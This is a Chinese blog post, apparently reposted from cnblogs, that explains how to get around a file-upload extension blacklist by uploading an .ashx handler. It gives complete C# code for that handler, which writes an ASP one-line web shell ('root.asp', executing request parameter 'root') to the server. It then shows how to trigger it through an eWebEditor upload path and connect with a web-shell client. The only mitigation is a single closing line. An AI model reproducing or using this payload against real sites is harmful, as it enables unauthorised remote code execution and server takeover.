码迷,mamicode.com
首页 > Web开发 > 详细

绕过黑名单上传

时间:2018-02-19 18:59:43      阅读:368      评论:0      收藏:0      [点我收藏+]

标签:安全   ash   proc   exec   sys   目录   ppa   com   黑名单   

突破上传限制 ashx后缀脚本执行



服务器过滤了asa,cer,cdx,htr,aspx,php,jsp 等脚本

突破的办法是什么呢?过滤常见脚本到底该如何突破?

这里我们还可以添加一个ashx 脚本类型。用ashx来写一个asp的一句话到当前目录。

代码如下。

<%@ WebHandler Language="C#"Class="Handler" %>

using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";

StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp"));
file1.Write("<%response.clear:execute request(\"root\"):response.End%>");
file1.Flush();
file1.Close();
}
public bool IsReusable {
get {
return false;
}
}
}

保存为 ashx ,现在来添加一个 ashx 上传类型看看.

上传成功,直接访问

http://www.xxxxx.com/admin/eWebEditor/UploadFile/201082143554545.ashx就会在当前目录生成一个root.asp的一句话木马。

看上传文件里,root.asp 已经躺在那边了,用lake2的 一句话连接,看见亲切的hello word !

有时候 网站过滤了常见的脚本类型却把 ashx给漏了…


安全措施:别漏了ashx。。。

绕过黑名单上传

标签:安全   ash   proc   exec   sys   目录   ppa   com   黑名单   

原文地址:https://www.cnblogs.com/xxrens/p/8454213.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!